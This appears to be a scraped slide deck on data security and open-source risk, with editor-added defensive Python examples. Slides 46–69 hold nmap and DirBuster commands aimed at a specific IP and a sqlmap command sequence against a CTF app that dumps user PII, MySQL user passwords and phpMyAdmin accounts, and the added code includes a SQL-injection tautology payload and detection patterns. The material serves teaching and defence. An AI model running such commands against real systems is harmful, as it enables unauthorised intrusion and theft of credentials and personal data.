"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 

Demystify Data Security Threats & Open Source Risks

  • 1. Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
  • 4. Information Security - Motivation Why Information Security is important?
  • 5. Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-accessed-email-ids-phone-numbers-of-over-5-million-yatra-users_a_23475885/
  • 6. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
  • 7. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
  • 8. Information Security - Motivation Source: https://economictimes.indiatimes.com/small-biz/security-tech/security/zomato-hacked-security-breach-results-in-17-million-user-data-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2019/07/09/warning-as-millions-of-zoom-users-risk-webcam-hijack-change-your-settings-now/#281cb40642d9
  • 14. Information Security - Ethics.
    ● Information Storage - What, which form, access to whom?
    ● Information Usage - Where, how, which form?
    ● Responsibility - Ownership, usage?
    ● Confidentiality
    ● Authentication
    ● Governance - Regulators, guidelines, damage?
    ● Freedom vs Force
    ● Damage to the Society.
    ● Impact on humanity.
    ● Data Breach and Cost.
  • 18. Data Monetization against ethics
    Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-about-cambridge-analytica-in-september-2015-per-court-filing/
    Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analytica-facebook-influence-us-election
  • 19. Encryption
    How many people have seen passwords in plain text in a database? 80%?? 90%?? Yes, sad but true.
    Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack-password/
  • 20. Encryption
    How many people have seen passwords in plain text in a database? 80%?? 90%?? Yes, sad but true.
    Never ever store the application's passwords in plain text. Encrypt it. Use Asymmetric Key Encryption. If RSA, use: ssh-keygen -t rsa -b 4096
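The slide's point is that a credentials table must never hold plain-text passwords. The example below is added by the editor, not part of the deck: it shows the form a stored credential normally takes in practice, a salted, iterated one-way hash (PBKDF2-HMAC-SHA256 from the Python standard library) rather than reversible encryption, so a dumped table yields nothing that can be decrypted; constant-time verification; and a small audit that flags rows whose value is not in that form. The sample rows, the `hunter2` value and the iteration count are constructed.

```python
"""Added example (not from the slides): store passwords as salted, iterated
one-way hashes, verify them in constant time, and audit a credentials column
for values that are not in that form. Sample rows are constructed."""
import hashlib
import hmac
import secrets
from typing import Optional

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000   # constructed default; raise it as your hardware budget allows


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algo$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = secrets.token_bytes(16)          # fresh per-user salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute from the parameters stored in the record and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        rounds = int(iterations)
    except ValueError:
        return False                            # malformed record never verifies
    if algo != ALGORITHM or rounds < 1:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, expected)


def is_hashed_record(value: str) -> bool:
    """True only for records in the algo$iterations$salt$digest form above."""
    parts = value.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM or not parts[1].isdigit():
        return False
    try:
        bytes.fromhex(parts[2])
        bytes.fromhex(parts[3])
    except ValueError:
        return False
    return True


def audit_credentials(rows) -> list:
    """Return the usernames whose stored credential is not a proper hash record.
    Plain text and bare unsalted digests are both flagged."""
    return [user for user, stored in rows if not is_hashed_record(stored)]


# Constructed table: one proper record, one plain-text value, one unsalted MD5 digest.
SAMPLE_ROWS = [
    ("alice", hash_password("correct horse battery staple", iterations=50_000)),
    ("bob", "hunter2"),
    ("carol", "5f4dcc3b5aa765d61d8327deb882cf99"),   # md5("password"), no salt
]

if __name__ == "__main__":
    print("needs migration:", audit_credentials(SAMPLE_ROWS))
    print("alice verifies:", verify_password("correct horse battery staple", SAMPLE_ROWS[0][1]))
```

The record carries its own salt and iteration count, so the cost factor can be raised later and old rows re-hashed on the user's next successful login without a schema change.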
  • 21. Authentication
    Open IP
    Open Ports
    Default username and password for database, services etc.
    chmod 777 for all directories and files! Lol ;p
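The three misconfigurations on this slide are all mechanically checkable. The following script is an added example by the editor, not part of the deck: it walks a directory tree for world-writable (`chmod 777`-style) entries, flags services bound to every interface, and matches service accounts against a list of vendor defaults. The default-credential list, the listener table and the throwaway directory tree are constructed; point `find_world_writable()` at your own deployment root.

```python
"""Added example (not from the slides): audit for world-writable paths,
listeners exposed on all interfaces, and default credentials. All sample
data is constructed."""
import os
import stat
import tempfile

# Constructed sample of vendor defaults; extend it from your own inventory.
DEFAULT_CREDENTIALS = {
    ("root", ""), ("root", "root"), ("admin", "admin"),
    ("postgres", "postgres"), ("guest", "guest"),
}
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def is_world_writable(mode: int) -> bool:
    """True when 'other' has the write bit, as in 777, 666 or 757."""
    return bool(mode & stat.S_IWOTH)


def find_world_writable(root: str) -> list:
    """Return world-writable files and directories under root, relative to root
    and sorted. Symlinks are skipped so a link cannot steer the audit outside
    the tree."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if is_world_writable(st.st_mode):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def exposed_listeners(listeners) -> list:
    """listeners: iterable of (service, bind_address, port). Returns the
    (service, port) pairs listening on every interface, i.e. reachable from
    any network the host sits on unless a firewall intervenes."""
    return [(svc, port) for svc, addr, port in listeners if addr in ALL_INTERFACES]


def uses_default_credentials(username: str, password: str) -> bool:
    return (username.lower(), password) in DEFAULT_CREDENTIALS


def demo_permissions() -> list:
    """Build a throwaway tree with one 777 file and one 777 directory and
    return what the audit flags."""
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in (("conf", 0o750), ("uploads", 0o777)):
            os.makedirs(os.path.join(root, rel))
            os.chmod(os.path.join(root, rel), mode)
        for rel, mode in (("conf/app.yml", 0o640), ("conf/secrets.env", 0o777)):
            path = os.path.join(root, rel)
            open(path, "w").close()
            os.chmod(path, mode)
        return find_world_writable(root)


# Constructed listener table, as you might collect from `ss -tlnp`.
SAMPLE_LISTENERS = [
    ("mysql", "127.0.0.1", 3306),
    ("mongod", "0.0.0.0", 27017),
    ("redis", "::", 6379),
    ("sshd", "0.0.0.0", 22),
]

if __name__ == "__main__":
    print("world-writable:", demo_permissions())
    print("exposed:", exposed_listeners(SAMPLE_LISTENERS))
    print("default creds:", uses_default_credentials("admin", "admin"))
```

The permission check uses `lstat` so that a symlink planted in an upload directory cannot make the audit report (or follow) paths outside the tree; the listener check is the host-side view of what an external port scan would show.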
  • 22. Information Security & Potential threats with Open Source World.
  • 23. Information Security & Potential threats with Open Source World. How many of you use Open Source ?
  • 24. Security for Open Source world How well do you know what is inside your project?
  • 25. Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
  • 26. Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf
  • 27. How Do I Choose GOOD Open Source
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look First look
  • 30. Key questions for a first look?
    ● Read the README.md or any other readily accessible introductory information.
    ● Does the code seem to be held to good software development standards?
    ● Was this code developed for professional purposes or as a hobby project?
    ● Any signs of known issues in the code?
    ● Does this code solve only one use case, or is it robust enough for other use cases?
    ● Is this code active, or an archive ("abandoned")?
    Look for warning signs...
  • 32. Even the author says: use something else! Source: https://code.google.com/archive/p/crypto-js/
  • 33. Built by an unauthorized person Source: https://metacpan.org/release/Tivoli-AccessManager-Admin
  • 34. I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730209a718cc9bada631cea136d13017752720f5
  • 37. It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
  • 39. Key Questions for each Open Source Library
    Do only 1-2 collaborators exist? If so, the chance of unreviewed, harmful code is higher.
    Is code merged to the master branch reviewed through a PR?
    How many issues are OPEN? Validate that OPEN issues are being addressed.
    Is the code maintained or abandoned? Are issues getting fixed and released promptly?
  • 40. Key Questions for each Open Source Library
    Check recently active committers and commits, to understand how old the project is.
    Check how they handle vulnerabilities and security: how can you report a security vulnerability? Check open security bugs/issues.
    Good example: the Apache community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn't mean SECURE! 1101 new vulnerabilities were reported in Oct 2019 alone. Source: https://nvd.nist.gov/vuln/full-listing/2019/10
  • 44. Vulnerability reports: it is getting far worse! Source: https://www.cvedetails.com/browse-by-date.php
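The checklist on slides 39-40 and the "no known vulnerabilities" caveat on slides 43-44 come together in a dependency triage step. The script below is an added example by the editor, not part of the deck: it parses pinned requirements, compares each pin against an advisory list by version, and turns the first-look questions (collaborator count, archived status, commit recency, a published way to report vulnerabilities) into mechanical warning signs. Every package name, version, advisory id and project record in it is constructed; real advisories come from feeds such as NVD, and an empty result means only that nothing in your feed matched, not that the dependency is secure.

```python
"""Added example (not from the slides): triage pinned dependencies against an
advisory list and score a repository against the checklist's warning signs.
All names, versions, advisory ids and metadata below are constructed."""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Advisory:
    package: str
    fixed_in: str       # first version that carries the fix
    advisory_id: str    # placeholder; real ids are CVE/GHSA identifiers


@dataclass(frozen=True)
class ProjectMetadata:
    name: str
    maintainers: int
    archived: bool
    last_commit: date
    has_security_policy: bool


ADVISORIES = [
    Advisory("jsonparse", "2.1.0", "ADV-0001 (placeholder)"),
    Advisory("cryptoutil", "0.9.5", "ADV-0002 (placeholder)"),
]
REQUIREMENTS = """\
jsonparse==2.0.3      # below fixed_in: affected
cryptoutil==0.9.5     # equals fixed_in: clean
httpclient==1.4.0     # no advisory on file
oldparser             # not pinned at all
"""


def parse_version(version: str) -> tuple:
    """'1.4.0' -> (1, 4, 0); a piece such as '2rc1' keeps only its leading digits."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def version_lt(a: str, b: str) -> bool:
    """Compare after zero-padding so that 1.0 equals 1.0.0 instead of sorting before it."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    return pa + (0,) * (width - len(pa)) < pb + (0,) * (width - len(pb))


def parse_requirements(text: str):
    """Yield (name, pinned_version_or_None) for each non-comment line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name, sep, version = line.partition("==")
        yield name.strip().lower(), (version.strip() if sep else None)


def audit_requirements(text: str, advisories) -> list:
    by_package = {}
    for adv in advisories:
        by_package.setdefault(adv.package, []).append(adv)
    findings = []
    for name, version in parse_requirements(text):
        if version is None:
            findings.append(f"{name}: not pinned, so the deployed version cannot be audited")
            continue
        for adv in by_package.get(name, []):
            if version_lt(version, adv.fixed_in):
                findings.append(f"{name}=={version}: affected by {adv.advisory_id}, "
                                f"fixed in {adv.fixed_in}")
    return findings


def warning_signs(meta: ProjectMetadata, today: date, stale_days: int = 365) -> list:
    """The slide's questions as checks; a hit is a prompt to read the repo, not a verdict."""
    signs = []
    if meta.archived:
        signs.append("archived: nobody will ship a fix")
    if meta.maintainers <= 2:
        signs.append("only 1-2 collaborators: merges may be unreviewed")
    if (today - meta.last_commit).days > stale_days:
        signs.append(f"no commit in {stale_days}+ days")
    if not meta.has_security_policy:
        signs.append("no published way to report a vulnerability")
    return signs


if __name__ == "__main__":
    for finding in audit_requirements(REQUIREMENTS, ADVISORIES):
        print(finding)
    toy = ProjectMetadata("toylib", 1, True, date(2017, 6, 1), False)
    print(warning_signs(toy, date(2019, 10, 18)))
```

Unpinned entries are reported on their own line because a build that floats its versions cannot be matched against any advisory at all, which is the supply-chain counterpart of the slide's "random code found on the Internet".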
  • 46. Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
  • 47. Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
  • 48. Subgraph Vega
    ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications.
    ● SQL Injection
    ● XSS
    ● Inadvertently disclosed sensitive information
    ● Reflected cross-site scripting
    ● Stored cross-site scripting
    ● Blind SQL injection
    ● Remote file include
    ● Shell injection
    ● TLS / SSL security settings
  • 49. Setup Proxy for Vega Tool
  • 50. Setup Proxy for Vega Tool
  • 51. Vega - Start the proxy!
  • 52. Vega - Start scanning Web application
  • 53. Vega - Start scanning Web application
  • 56. Web Application - Tracing web request payload at Proxy
  • 57. Web Application - Tracing web request payload at Proxy
  • 58. Web Application - Intercepting the response callback at Proxy
  • 59. SqlMap - A penetration testing tool for exploiting SQL injection flaws, and a lot more!
    ● Database fingerprinting.
    ● Full support for SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
    ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
    ● Dump database tables entirely.
    ● Out-of-the-box search support for database names, table names, column names and values.
    ● Support to execute arbitrary commands and retrieve their standard output.
    ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
  • 60. Demo - Penetration testing a Web Application using SQLMap
  • 61. Demo - Penetration testing a Web Application using SQLMap
  • 62. Demo - Penetration testing a Web Application using SQLMap
  • 63. Demo - Penetration testing a Web Application using SQLMap
  • 64. Demo - Penetration testing a Web Application using SQLMap
  • 65. Demo - Penetration testing a Web Application using SQLMap
  • 66. Demo - Penetration testing a Web Application using SQLMap
  • 67. Demo - Penetration testing a Web Application using SQLMap
  • 68. Demo - Penetration testing a Web Application using SQLMap
  • 69. SQLMap - Commands
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns
    python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump
    https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a8709f33ac5
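The demo above walks the whole chain from one injectable `email` parameter to dumped tables. What makes that possible, and what closes it, is shown in the following example added by the editor (not the deck's code or the CTF application): a profile lookup that splices user input into the SQL text, the parameterised version that does not, and a check over web-server log lines for the traffic such a scan leaves behind. The `user_profile` rows, the log lines and the scanner version string in the User-Agent are constructed; sqlmap's default User-Agent does begin with `sqlmap/`.

```python
"""Added example (not from the slides): the injectable query pattern beside
its parameterised fix, plus a log check for injection traffic. The table,
rows and log lines are constructed."""
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed rows shaped like the demo's user_profile(Email, Mobile, Name).
SAMPLE_ROWS = [
    ("alice@example.com", "+10000000001", "Alice"),
    ("bob@example.com", "+10000000002", "Bob"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_profile (Email TEXT, Mobile TEXT, Name TEXT)")
    conn.executemany("INSERT INTO user_profile VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, email: str) -> list:
    # VULNERABLE: the caller's string becomes part of the statement, so a quote
    # in it rewrites the WHERE clause. This is what sqlmap's -p option probes.
    sql = f"SELECT Email, Mobile, Name FROM user_profile WHERE Email = '{email}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, email: str) -> list:
    # FIXED: the value is bound as a parameter and can never become SQL syntax.
    sql = "SELECT Email, Mobile, Name FROM user_profile WHERE Email = ?"
    return conn.execute(sql, (email,)).fetchall()


TAUTOLOGY = "' OR '1'='1"   # the textbook boolean payload


def rows_returned(user_input: str = TAUTOLOGY) -> tuple:
    """(rows from the vulnerable lookup, rows from the safe lookup) for one input."""
    conn = make_db()
    return len(lookup_vulnerable(conn, user_input)), len(lookup_safe(conn, user_input))


# ---- detection side ---------------------------------------------------------
SCANNER_UA = re.compile(r"^sqlmap/", re.I)           # sqlmap's default User-Agent prefix
SQLI_MARKERS = re.compile(                            # applied after URL-decoding
    r"'\s*(?:or|and)\s*'?\w*'?\s*=|\bunion\b\s+(?:all\s+)?select\b|\bsleep\s*\(",
    re.I,
)
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP/')

# Constructed combined-format access log lines.
LOG_LINES = [
    '10.0.0.5 - - [18/Oct/2019:10:00:01 +0000] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Oct/2019:10:00:07 +0000] "GET /profile?email=a%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/Oct/2019:10:00:09 +0000] "GET /profile?email=a%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 HTTP/1.1" 500 0 "-" "sqlmap/1.3.10#stable (http://sqlmap.org)"',
]


def flag_requests(lines) -> list:
    """Return (line_index, reasons) for lines that look like injection traffic."""
    flagged = []
    for i, line in enumerate(lines):
        reasons = []
        m = REQUEST_RE.search(line)
        if m and SQLI_MARKERS.search(unquote_plus(m.group(1))):
            reasons.append("sqli-pattern")
        user_agent = line.rsplit('"', 2)[1] if line.count('"') >= 2 else ""
        if SCANNER_UA.search(user_agent):
            reasons.append("scanner-user-agent")
        if reasons:
            flagged.append((i, reasons))
    return flagged


if __name__ == "__main__":
    print("rows (vulnerable, safe):", rows_returned())
    for idx, why in flag_requests(LOG_LINES):
        print(idx, why, LOG_LINES[idx][:60])
```

The User-Agent match is the weakest signal, since a scanner can set any string it likes; the decoded-query patterns catch the probes regardless of what the client calls itself, and the real fix is the parameterised query, after which sqlmap's `--dbs` has nothing to work with.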
  • 71. Hope you had fun!
  • 72. Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri